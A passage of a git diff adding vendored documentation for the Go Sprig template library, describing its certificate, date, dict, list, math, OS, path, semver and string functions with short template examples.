+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := buildCustomCert "base64-encoded-ca-crt" "base64-encoded-ca-key"
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genCA
+
+The `genCA` function generates a new, self-signed x509 certificate authority.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genSelfSignedCert
+
+The `genSelfSignedCert` function generates a new, self-signed x509 certificate.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$cert := genSelfSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365
+```
+
+## genSignedCert
+
+The `genSignedCert` function generates a new, x509 certificate signed by the
+specified CA.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+- CA (see `genCA`)
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+$cert := genSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 $ca
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/date.md b/vendor/github.com/Masterminds/sprig/docs/date.md
new file mode 100644
index 0000000000..9a4f673503
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/date.md
@@ -0,0 +1,88 @@
+# Date Functions
+
+## now
+
+The current date/time. Use this in conjunction with other date functions.
+
+
+## ago
+
+The `ago` function returns the duration since the given time, rounded to
+seconds resolution.
+
+```
+ago .CreatedAt
+```
+
+The result is in `time.Duration` `String()` format, for example
+
+```
+2h34m7s
+```
+
+## date
+
+The `date` function formats a date.
+
+
+Format the date to YEAR-MONTH-DAY:
+```
+now | date "2006-01-02"
+```
+
+Date formatting in Go is a [little bit different](https://pauladamsmith.com/blog/2011/05/go_time.html).
+
+In short, take this as the base date:
+
+```
+Mon Jan 2 15:04:05 MST 2006
+```
+
+Write it in the format you want. Above, `2006-01-02` is the same date, but
+in the format we want.
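+
+For example, a full timestamp with time-of-day can be formatted with:
+
+```
+now | date "2006-01-02 15:04:05"
+```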
+
+## dateInZone
+
+Same as `date`, but with a timezone.
+
+```
+date "2006-01-02" (now) "UTC"
+```
+
+## dateModify
+
+The `dateModify` function takes a duration modification and a date, and returns the adjusted timestamp.
+
+Subtract an hour and thirty minutes from the current time:
+
+```
+now | date_modify "-1.5h"
+```
+
+## htmlDate
+
+The `htmlDate` function formats a date for inserting into an HTML date picker
+input field.
+
+```
+now | htmlDate
+```
+
+## htmlDateInZone
+
+Same as htmlDate, but with a timezone.
+
+```
+htmlDate (now) "UTC"
+```
+
+## toDate
+
+`toDate` converts a string to a date. The first argument is the date layout and
+the second the date string. If the string can't be converted, it returns the zero
+value.
+
+This is useful when you want to convert a string date to another format
+(using pipe). The example below converts "2017-12-31" to "31/12/2017".
+
+```
+toDate "2006-01-02" "2017-12-31" | date "02/01/2006"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/defaults.md b/vendor/github.com/Masterminds/sprig/docs/defaults.md
new file mode 100644
index 0000000000..c0cae90e53
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/defaults.md
@@ -0,0 +1,113 @@
+# Default Functions
+
+Sprig provides tools for setting default values for templates.
+
+## default
+
+To set a simple default value, use `default`:
+
+```
+default "foo" .Bar
+```
+
+In the above, if `.Bar` evaluates to a non-empty value, it will be used. But if
+it is empty, `foo` will be returned instead.
+
+The definition of "empty" depends on type:
+
+- Numeric: 0
+- String: ""
+- Lists: `[]`
+- Dicts: `{}`
+- Boolean: `false`
+- And always `nil` (aka null)
+
+For structs, there is no definition of empty, so a struct will never return the
+default.
+
+## empty
+
+The `empty` function returns `true` if the given value is considered empty, and
+`false` otherwise. The empty values are listed in the `default` section.
+
+```
+empty .Foo
+```
+
+Note that in Go template conditionals, emptiness is calculated for you. Thus,
+you rarely need `if empty .Foo`. Instead, just use `if .Foo`.
+
+## coalesce
+
+The `coalesce` function takes a list of values and returns the first non-empty
+one.
+
+```
+coalesce 0 1 2
+```
+
+The above returns `1`.
+
+This function is useful for scanning through multiple variables or values:
+
+```
+coalesce .name .parent.name "Matt"
+```
+
+The above will first check to see if `.name` is empty. If it is not, it will return
+that value. If it _is_ empty, `coalesce` will evaluate `.parent.name` for emptiness.
+Finally, if both `.name` and `.parent.name` are empty, it will return `Matt`.
+
+## toJson
+
+The `toJson` function encodes an item into a JSON string.
+
+```
+toJson .Item
+```
+
+The above returns the JSON string representation of `.Item`.
+
+## toPrettyJson
+
+The `toPrettyJson` function encodes an item into a pretty (indented) JSON string.
+
+```
+toPrettyJson .Item
+```
+
+The above returns the indented JSON string representation of `.Item`.
+
+## ternary
+
+The `ternary` function takes two values and a test value. If the test value is
+true, the first value is returned; otherwise, the second value is returned. This
+is similar to the C ternary operator.
+
+### true test value
+
+```
+ternary "foo" "bar" true
+```
+
+or
+
+```
+true | ternary "foo" "bar"
+```
+
+The above returns `"foo"`.
+
+### false test value
+
+```
+ternary "foo" "bar" false
+```
+
+or
+
+```
+false | ternary "foo" "bar"
+```
+
+The above returns `"bar"`.
diff --git a/vendor/github.com/Masterminds/sprig/docs/dicts.md b/vendor/github.com/Masterminds/sprig/docs/dicts.md
new file mode 100644
index 0000000000..cfd3e27a2a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/dicts.md
@@ -0,0 +1,131 @@
+# Dictionaries and Dict Functions
+
+Sprig provides a key/value storage type called a `dict` (short for "dictionary",
+as in Python). A `dict` is an _unordered_ type.
+
+The key to a dictionary **must be a string**. However, the value can be any
+type, even another `dict` or `list`.
+
+Unlike `list`s, `dict`s are not immutable. The `set` and `unset` functions will
+modify the contents of a dictionary.
+
+## dict
+
+Creating dictionaries is done by calling the `dict` function and passing it a
+list of pairs.
+
+The following creates a dictionary with three items:
+
+```
+$myDict := dict "name1" "value1" "name2" "value2" "name3" "value 3"
+```
+
+## set
+
+Use `set` to add a new key/value pair to a dictionary.
+
+```
+$_ := set $myDict "name4" "value4"
+```
+
+Note that `set` _returns the dictionary_ (a requirement of Go template functions),
+so you may need to trap the value as done above with the `$_` assignment.
+
+## unset
+
+Given a map and a key, delete the key from the map.
+
+```
+$_ := unset $myDict "name4"
+```
+
+As with `set`, this returns the dictionary.
+
+Note that if the key is not found, this operation will simply return. No error
+will be generated.
+
+## hasKey
+
+The `hasKey` function returns `true` if the given dict contains the given key.
+
+```
+hasKey $myDict "name1"
+```
+
+If the key is not found, this returns `false`.
+
+## pluck
+
+The `pluck` function makes it possible to give one key and multiple maps, and
+get a list of all of the matches:
+
+```
+pluck "name1" $myDict $myOtherDict
+```
+
+The above will return a `list` containing every found value (`[value1 otherValue1]`).
+
+If the given key is _not found_ in a map, that map will not have an item in the
+list (and the length of the returned list will be less than the number of dicts
+in the call to `pluck`).
+
+If the key is _found_ but the value is an empty value, that value will be
+inserted.
+
+A common idiom in Sprig templates is to use `pluck... | first` to get the first
+matching key out of a collection of dictionaries.
+
+## merge
+
+Merge two or more dictionaries into one, giving precedence to the dest dictionary:
+
+```
+$newdict := merge $dest $source1 $source2
+```
+
+This is a deep merge operation.
+
+## keys
+
+The `keys` function will return a `list` of all of the keys in one or more `dict`
+types. Since a dictionary is _unordered_, the keys will not be in a predictable order.
+They can be sorted with `sortAlpha`.
+
+```
+keys $myDict | sortAlpha
+```
+
+When supplying multiple dictionaries, the keys will be concatenated. Use the `uniq`
+function along with `sortAlpha` to get a unique, sorted list of keys.
+
+```
+keys $myDict $myOtherDict | uniq | sortAlpha
+```
+
+## pick
+
+The `pick` function selects just the given keys out of a dictionary, creating a
+new `dict`.
+
+```
+$new := pick $myDict "name1" "name3"
+```
+
+The above returns `{name1: value1, name3: value 3}`
+
+## omit
+
+The `omit` function is similar to `pick`, except it returns a new `dict` with all
+the keys that _do not_ match the given keys.
+
+```
+$new := omit $myDict "name1" "name3"
+```
+
+The above returns `{name2: value2}`
+
+## A Note on Dict Internals
+
+A `dict` is implemented in Go as a `map[string]interface{}`. Go developers can
+pass `map[string]interface{}` values into the context to make them available
+to templates as `dict`s.
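+
+For instance, here is a minimal Go sketch (the names `ctx` and `demo` are
+illustrative) showing how a `map[string]interface{}` becomes a `dict` inside a
+template:
+
+```
+package main
+
+import (
+	"os"
+	"text/template"
+
+	"github.com/Masterminds/sprig"
+)
+
+func main() {
+	// ctx is exposed to the template as a dict.
+	ctx := map[string]interface{}{"greeting": "hello"}
+	tpl := template.Must(template.New("demo").
+		Funcs(sprig.TxtFuncMap()).
+		Parse(`{{ hasKey . "greeting" }} {{ .greeting | upper }}`))
+	_ = tpl.Execute(os.Stdout, ctx) // prints: true HELLO
+}
+```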
diff --git a/vendor/github.com/Masterminds/sprig/docs/encoding.md b/vendor/github.com/Masterminds/sprig/docs/encoding.md
new file mode 100644
index 0000000000..1c7a36f849
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/encoding.md
@@ -0,0 +1,6 @@
+# Encoding Functions
+
+Sprig has the following encoding and decoding functions:
+
+- `b64enc`/`b64dec`: Encode or decode with Base64
+- `b32enc`/`b32dec`: Encode or decode with Base32
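+
+For example, a minimal sketch:
+
+```
+b64enc "hello"
+```
+
+The above returns `aGVsbG8=`, and `b64dec "aGVsbG8="` returns `hello`.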
diff --git a/vendor/github.com/Masterminds/sprig/docs/flow_control.md b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
new file mode 100644
index 0000000000..6414640a6a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
@@ -0,0 +1,11 @@
+# Flow Control Functions
+
+## fail
+
+Unconditionally returns an empty `string` and an `error` with the specified
+text. This is useful in scenarios where other conditionals have determined that
+template rendering should fail.
+
+```
+fail "Please accept the end user license agreement"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/index.md b/vendor/github.com/Masterminds/sprig/docs/index.md
new file mode 100644
index 0000000000..24e17d89cc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/index.md
@@ -0,0 +1,23 @@
+# Sprig Function Documentation
+
+The Sprig library provides over 70 template functions for Go's template language.
+
+- [String Functions](strings.md): `trim`, `wrap`, `randAlpha`, `plural`, etc.
+ - [String List Functions](string_slice.md): `splitList`, `sortAlpha`, etc.
+- [Math Functions](math.md): `add`, `max`, `mul`, etc.
+ - [Integer Slice Functions](integer_slice.md): `until`, `untilStep`
+- [Date Functions](date.md): `now`, `date`, etc.
+- [Defaults Functions](defaults.md): `default`, `empty`, `coalesce`, `toJson`, `toPrettyJson`
+- [Encoding Functions](encoding.md): `b64enc`, `b64dec`, etc.
+- [Lists and List Functions](lists.md): `list`, `first`, `uniq`, etc.
+- [Dictionaries and Dict Functions](dicts.md): `dict`, `hasKey`, `pluck`, etc.
+- [Type Conversion Functions](conversion.md): `atoi`, `int64`, `toString`, etc.
+- [File Path Functions](paths.md): `base`, `dir`, `ext`, `clean`, `isAbs`
+- [Flow Control Functions](flow_control.md): `fail`
+- Advanced Functions
+ - [UUID Functions](uuid.md): `uuidv4`
+ - [OS Functions](os.md): `env`, `expandenv`
+ - [Version Comparison Functions](semver.md): `semver`, `semverCompare`
+ - [Reflection](reflection.md): `typeOf`, `kindIs`, `typeIsLike`, etc.
+ - [Cryptographic and Security Functions](crypto.md): `derivePassword`, `sha256sum`, `genPrivateKey`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/integer_slice.md b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
new file mode 100644
index 0000000000..8929d30363
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
@@ -0,0 +1,25 @@
+# Integer Slice Functions
+
+## until
+
+The `until` function builds a range of integers.
+
+```
+until 5
+```
+
+The above generates the list `[0, 1, 2, 3, 4]`.
+
+This is useful for looping with `range $i, $e := until 5`.
+
+## untilStep
+
+Like `until`, `untilStep` generates a list of counting integers. But it allows
+you to define a start, stop, and step:
+
+```
+untilStep 3 6 2
+```
+
+The above will produce `[3 5]` by starting with 3 and adding 2 until the value
+is equal to or greater than 6. This is similar to Python's `range` function.
diff --git a/vendor/github.com/Masterminds/sprig/docs/lists.md b/vendor/github.com/Masterminds/sprig/docs/lists.md
new file mode 100644
index 0000000000..22441cec54
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/lists.md
@@ -0,0 +1,111 @@
+# Lists and List Functions
+
+Sprig provides a simple `list` type that can contain arbitrary sequential lists
+of data. This is similar to arrays or slices, but lists are designed to be used
+as immutable data types.
+
+Create a list of integers:
+
+```
+$myList := list 1 2 3 4 5
+```
+
+The above creates a list of `[1 2 3 4 5]`.
+
+## first
+
+To get the head item on a list, use `first`.
+
+`first $myList` returns `1`
+
+## rest
+
+To get the tail of the list (everything but the first item), use `rest`.
+
+`rest $myList` returns `[2 3 4 5]`
+
+## last
+
+To get the last item on a list, use `last`:
+
+`last $myList` returns `5`. This is roughly analogous to reversing a list and
+then calling `first`.
+
+## initial
+
+This complements `last` by returning all _but_ the last element.
+`initial $myList` returns `[1 2 3 4]`.
+
+## append
+
+Append a new item to an existing list, creating a new list.
+
+```
+$new := append $myList 6
+```
+
+The above would set `$new` to `[1 2 3 4 5 6]`. `$myList` would remain unaltered.
+
+## prepend
+
+Push an element onto the front of a list, creating a new list.
+
+```
+prepend $myList 0
+```
+
+The above would produce `[0 1 2 3 4 5]`. `$myList` would remain unaltered.
+
+## reverse
+
+Produce a new list with the reversed elements of the given list.
+
+```
+reverse $myList
+```
+
+The above would generate the list `[5 4 3 2 1]`.
+
+## uniq
+
+Generate a list with all of the duplicates removed.
+
+```
+list 1 1 1 2 | uniq
+```
+
+The above would produce `[1 2]`
+
+## without
+
+The `without` function filters items out of a list.
+
+```
+without $myList 3
+```
+
+The above would produce `[1 2 4 5]`
+
+Without can take more than one filter:
+
+```
+without $myList 1 3 5
+```
+
+That would produce `[2 4]`
+
+## has
+
+Test to see if a list has a particular element.
+
+```
+has $myList 4
+```
+
+The above would return `true`, while `has $myList "hello"` would return `false`.
+
+## A Note on List Internals
+
+A list is implemented in Go as a `[]interface{}`. For Go developers embedding
+Sprig, you may pass `[]interface{}` items into your template context and be
+able to use all of the `list` functions on those items.
diff --git a/vendor/github.com/Masterminds/sprig/docs/math.md b/vendor/github.com/Masterminds/sprig/docs/math.md
new file mode 100644
index 0000000000..95f2f1e599
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/math.md
@@ -0,0 +1,63 @@
+# Math Functions
+
+All math functions operate on `int64` values unless specified otherwise.
+
+(In the future, these will be extended to handle floats as well)
+
+## add
+
+Sum numbers with `add`
+
+## add1
+
+To increment by 1, use `add1`
+
+## sub
+
+To subtract, use `sub`
+
+## div
+
+Perform integer division with `div`
+
+## mod
+
+Modulo with `mod`
+
+## mul
+
+Multiply with `mul`
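+
+For example, a quick sketch of the arithmetic functions:
+
+```
+add 1 2 3
+```
+
+The above returns `6`. Likewise, `sub 7 2` returns `5`, `div 10 3` returns `3`
+(integer division), `mod 10 3` returns `1`, and `mul 2 3 4` returns `24`.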
+
+## max
+
+Return the largest of a series of integers:
+
+This will return `3`:
+
+```
+max 1 2 3
+```
+
+## min
+
+Return the smallest of a series of integers.
+
+`min 1 2 3` will return `1`.
+
+## floor
+
+Returns the greatest float value less than or equal to the input value
+
+`floor 123.9999` will return `123.0`
+
+## ceil
+
+Returns the smallest float value greater than or equal to the input value
+
+`ceil 123.001` will return `124.0`
+
+## round
+
+Returns a float value with the remainder rounded to the given number of digits after the decimal point.
+
+`round 123.555555 3` will return `123.556`
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/os.md b/vendor/github.com/Masterminds/sprig/docs/os.md
new file mode 100644
index 0000000000..e4c197ad04
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/os.md
@@ -0,0 +1,24 @@
+# OS Functions
+
+_WARNING:_ These functions can lead to information leakage if not used
+appropriately.
+
+_WARNING:_ Some notable implementations of Sprig (such as
+[Kubernetes Helm](http://helm.sh)) _do not provide these functions for security
+reasons_.
+
+## env
+
+The `env` function reads an environment variable:
+
+```
+env "HOME"
+```
+
+## expandenv
+
+To substitute environment variables in a string, use `expandenv`:
+
+```
+expandenv "Your path is set to $PATH"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/paths.md b/vendor/github.com/Masterminds/sprig/docs/paths.md
new file mode 100644
index 0000000000..87ec6d45a2
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/paths.md
@@ -0,0 +1,43 @@
+# File Path Functions
+
+While Sprig does not grant access to the filesystem, it does provide functions
+for working with strings that follow file path conventions.
+
+## base
+
+Return the last element of a path.
+
+```
+base "foo/bar/baz"
+```
+
+The above prints "baz"
+
+## dir
+
+Return the directory, stripping the last part of the path. So `dir "foo/bar/baz"`
+returns `foo/bar`
+
+## clean
+
+Clean up a path.
+
+```
+clean "foo/bar/../baz"
+```
+
+The above resolves the `..` and returns `foo/baz`
+
+## ext
+
+Return the file extension.
+
+```
+ext "foo.bar"
+```
+
+The above returns `.bar`.
+
+## isAbs
+
+To check whether a file path is absolute, use `isAbs`.
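+
+```
+isAbs "/foo/bar"
+```
+
+The above returns `true`.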
diff --git a/vendor/github.com/Masterminds/sprig/docs/reflection.md b/vendor/github.com/Masterminds/sprig/docs/reflection.md
new file mode 100644
index 0000000000..597871f3c5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/reflection.md
@@ -0,0 +1,38 @@
+# Reflection Functions
+
+Sprig provides rudimentary reflection tools. These help advanced template
+developers understand the underlying Go type information for a particular value.
+
+Go has several primitive _kinds_, like `string`, `slice`, `int64`, and `bool`.
+
+Go has an open _type_ system that allows developers to create their own types.
+
+Sprig provides a set of functions for each.
+
+## Kind Functions
+
+There are two kind functions. `kindOf` returns the kind of an object:
+
+```
+kindOf "hello"
+```
+
+The above would return `string`. For simple tests (like in `if` blocks), the
+`kindIs` function will let you verify that a value is a particular kind:
+
+```
+kindIs "int" 123
+```
+
+The above will return `true`
+
+## Type Functions
+
+Types are slightly harder to work with, so there are three different functions:
+
+- `typeOf` returns the underlying type of a value: `typeOf $foo`
+- `typeIs` is like `kindIs`, but for types: `typeIs "*io.Buffer" $myVal`
+- `typeIsLike` works as `typeIs`, except that it also dereferences pointers.
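+
+For example, a small sketch:
+
+```
+typeOf 42
+```
+
+The above returns `int`.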
+
+**Note:** None of these can test whether or not something implements a given
+interface, since doing so would require compiling the interface in ahead of time.
diff --git a/vendor/github.com/Masterminds/sprig/docs/semver.md b/vendor/github.com/Masterminds/sprig/docs/semver.md
new file mode 100644
index 0000000000..e0cbfeb7ae
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/semver.md
@@ -0,0 +1,124 @@
+# Semantic Version Functions
+
+Some version schemes are easily parseable and comparable. Sprig provides functions
+for working with [SemVer 2](http://semver.org) versions.
+
+## semver
+
+The `semver` function parses a string into a Semantic Version:
+
+```
+$version := semver "1.2.3-alpha.1+123"
+```
+
+_If the parser fails, it will cause template execution to halt with an error._
+
+At this point, `$version` is a pointer to a `Version` object with the following
+properties:
+
+- `$version.Major`: The major number (`1` above)
+- `$version.Minor`: The minor number (`2` above)
+- `$version.Patch`: The patch number (`3` above)
+- `$version.Prerelease`: The prerelease (`alpha.1` above)
+- `$version.Metadata`: The build metadata (`123` above)
+- `$version.Original`: The original version as a string
+
+Additionally, you can compare a `Version` to another `Version` using the `Compare`
+function:
+
+```
+semver "1.4.3" | (semver "1.2.3").Compare
+```
+
+The above will return `-1`.
+
+The return values are:
+
+- `-1` if the given semver is greater than the semver whose `Compare` method was called
+- `1` if the version whose `Compare` method was called is greater
+- `0` if they are the same version
+
+(Note that in SemVer, the `Metadata` field is not compared during version
+comparison operations.)
+
+
+## semverCompare
+
+A more robust comparison function is provided as `semverCompare`. This version
+supports version ranges:
+
+- `semverCompare "1.2.3" "1.2.3"` checks for an exact match
+- `semverCompare "^1.2.0" "1.2.3"` checks that the major and minor versions match, and that the patch
+ number of the second version is _greater than or equal to_ the first parameter.
+
+The SemVer functions use the [Masterminds semver library](https://github.com/Masterminds/semver),
+from the creators of Sprig.
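+
+For example, a small template sketch:
+
+```
+semverCompare "^1.2.0" "1.2.3"
+```
+
+The above returns `true`, since `1.2.3` satisfies the `^1.2.0` constraint.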
+
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma-separated AND comparisons. These are then joined by `||` OR
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges, and the first is hyphen ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the patch level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `< 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparing API versions, as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/string_slice.md b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
new file mode 100644
index 0000000000..25643ec1c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
@@ -0,0 +1,55 @@
+# String Slice Functions
+
+These functions operate on or generate slices of strings. In Go, a slice is a
+growable array. In Sprig, it's a special case of a `list`.
+
+## join
+
+Join a list of strings into a single string, with the given separator.
+
+```
+list "hello" "world" | join "_"
+```
+
+The above will produce `hello_world`
+
+`join` will try to convert non-strings to a string value:
+
+```
+list 1 2 3 | join "+"
+```
+
+The above will produce `1+2+3`
+
+## splitList and split
+
+Split a string into a list of strings:
+
+```
+splitList "$" "foo$bar$baz"
+```
+
+The above will return `[foo bar baz]`
+
+The older `split` function splits a string into a `dict`. It is designed to make
+it easy to use template dot notation for accessing members:
+
+```
+$a := split "$" "foo$bar$baz"
+```
+
+The above produces a map with index keys. `{_0: foo, _1: bar, _2: baz}`
+
+```
+$a._0
+```
+
+The above produces `foo`
+
+## sortAlpha
+
+The `sortAlpha` function sorts a list of strings into alphabetical (lexicographical)
+order.
+
+It does _not_ sort in place, but returns a sorted copy of the list, in keeping
+with the immutability of lists.
diff --git a/vendor/github.com/Masterminds/sprig/docs/strings.md b/vendor/github.com/Masterminds/sprig/docs/strings.md
new file mode 100644
index 0000000000..8deb4cf6b0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/strings.md
@@ -0,0 +1,397 @@
+# String Functions
+
+Sprig has a number of string manipulation functions.
+
+## trim
+
+The `trim` function removes space from either side of a string:
+
+```
+trim " hello "
+```
+
+The above produces `hello`
+
+## trimAll
+
+Remove given characters from the front or back of a string:
+
+```
+trimAll "$" "$5.00"
+```
+
+The above returns `5.00` (as a string).
+
+## trimSuffix
+
+Trim just the suffix from a string:
+
+```
+trimSuffix "-" "hello-"
+```
+
+The above returns `hello`
+
+## upper
+
+Convert the entire string to uppercase:
+
+```
+upper "hello"
+```
+
+The above returns `HELLO`
+
+## lower
+
+Convert the entire string to lowercase:
+
+```
+lower "HELLO"
+```
+
+The above returns `hello`
+
+## title
+
+Convert to title case:
+
+```
+title "hello world"
+```
+
+The above returns `Hello World`
+
+## untitle
+
+Remove title casing. `untitle "Hello World"` produces `hello world`.
+
+## repeat
+
+Repeat a string multiple times:
+
+```
+repeat 3 "hello"
+```
+
+The above returns `hellohellohello`
+
+## substr
+
+Get a substring from a string. It takes three parameters:
+
+- start (int)
+- length (int)
+- string (string)
+
+```
+substr 0 5 "hello world"
+```
+
+The above returns `hello`
+
+## nospace
+
+Remove all whitespace from a string.
+
+```
+nospace "hello w o r l d"
+```
+
+The above returns `helloworld`
+
+## trunc
+
+Truncate a string (and add no suffix)
+
+```
+trunc 5 "hello world"
+```
+
+The above produces `hello`.
+
+## abbrev
+
+Truncate a string with ellipses (`...`)
+
+Parameters:
+- max length
+- the string
+
+```
+abbrev 5 "hello world"
+```
+
+The above returns `he...`, since it counts the width of the ellipses against the
+maximum length.
+
+## abbrevboth
+
+Abbreviate both sides:
+
+```
+abbrevboth 5 10 "1234 5678 9123"
+```
+
+The above produces `...5678...`
+
+It takes:
+
+- left offset
+- max length
+- the string
+
+## initials
+
+Given multiple words, take the first letter of each word and combine.
+
+```
+initials "First Try"
+```
+
+The above returns `FT`
+
+## randAlphaNum, randAlpha, randNumeric, and randAscii
+
+These four functions generate random strings, but with different base character
+sets:
+
+- `randAlphaNum` uses `0-9a-zA-Z`
+- `randAlpha` uses `a-zA-Z`
+- `randNumeric` uses `0-9`
+- `randAscii` uses all printable ASCII characters
+
+Each of them takes one parameter: the integer length of the string.
+
+```
+randNumeric 3
+```
+
+The above will produce a random string with three digits.
+
+## wrap
+
+Wrap text at a given column count:
+
+```
+wrap 80 $someText
+```
+
+The above will wrap the string in `$someText` at 80 columns.
+
+## wrapWith
+
+`wrapWith` works as `wrap`, but lets you specify the string to wrap with.
+(`wrap` uses `\n`)
+
+```
+wrapWith 5 "\t" "Hello World"
+```
+
+The above produces `Hello World` (where the whitespace is an ASCII tab
+character)
+
+## contains
+
+Test to see if one string is contained inside of another:
+
+```
+contains "cat" "catch"
+```
+
+The above returns `true` because `catch` contains `cat`.
+
+## hasPrefix and hasSuffix
+
+The `hasPrefix` and `hasSuffix` functions test whether a string has a given
+prefix or suffix:
+
+```
+hasPrefix "cat" "catch"
+```
+
+The above returns `true` because `catch` has the prefix `cat`.
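+
+The suffix check works the same way:
+
+```
+hasSuffix "tch" "catch"
+```
+
+The above returns `true` because `catch` ends with `tch`.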
+
+## quote and squote
+
+These functions wrap a string in double quotes (`quote`) or single quotes
+(`squote`).
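+
+For example, a minimal sketch:
+
+```
+quote "hello"
+```
+
+The above returns `"hello"` (with the double quotes included), while
+`squote "hello"` returns `'hello'`.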
+
+## cat
+
+The `cat` function concatenates multiple strings together into one, separating
+them with spaces:
+
+```
+cat "hello" "beautiful" "world"
+```
+
+The above produces `hello beautiful world`
+
+## indent
+
+The `indent` function indents every line in a given string to the specified
+indent width. This is useful when aligning multi-line strings:
+
+```
+indent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters.
+
+## nindent
+
+The `nindent` function is the same as the indent function, but prepends a new
+line to the beginning of the string.
+
+```
+nindent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters and add a new
+line to the beginning.
+
+## replace
+
+Perform simple string replacement.
+
+It takes three arguments:
+
+- string to replace
+- string to replace with
+- source string
+
+```
+"I Am Henry VIII" | replace " " "-"
+```
+
+The above will produce `I-Am-Henry-VIII`
+
+## plural
+
+Pluralize a string.
+
+```
+len $fish | plural "one anchovy" "many anchovies"
+```
+
+In the above, if the length of `$fish` is 1, the first argument will be
+printed (`one anchovy`). Otherwise, the second argument will be printed
+(`many anchovies`).
+
+The arguments are:
+
+- singular string
+- plural string
+- length integer
+
+NOTE: Sprig does not currently support languages with more complex pluralization
+rules. And `0` is considered a plural because the English language treats it
+as such (`zero anchovies`). The Sprig developers are working on a solution for
+better internationalization.
+
+## snakecase
+
+Convert string from camelCase to snake_case.
+
+Introduced in 2.12.0.
+
+```
+snakecase "FirstName"
+```
+
+The above will produce `first_name`.
+
+## camelcase
+
+Convert string from snake_case to CamelCase
+
+Introduced in 2.12.0.
+
+```
+camelcase "http_server"
+```
+
+The above will produce `HttpServer`.
+
+## shuffle
+
+Shuffle a string.
+
+Introduced in 2.12.0.
+
+
+```
+shuffle "hello"
+```
+
+The above will randomize the letters in `hello`, perhaps producing `oelhl`.
+
+## regexMatch
+
